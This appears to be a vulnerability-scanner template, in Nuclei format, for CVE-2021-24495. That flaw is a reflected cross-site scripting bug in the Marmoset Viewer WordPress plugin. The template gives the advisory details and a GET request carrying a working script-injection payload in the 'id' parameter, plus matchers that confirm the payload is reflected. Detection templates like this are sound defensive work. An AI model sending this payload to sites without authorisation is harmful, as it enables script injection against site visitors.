id: CVE-2021-24495 info: name: Wordpress Plugin Marmoset Viewer XSS author: johnjhacking severity: medium description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue. reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24495 cwe-id: CWE-79 tags: cve,cve2021,wp-plugin,wordpress,xss requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" - "alert(/{{randstr}}/)" part: body condition: or - type: word words: - "Marmoset Viewer"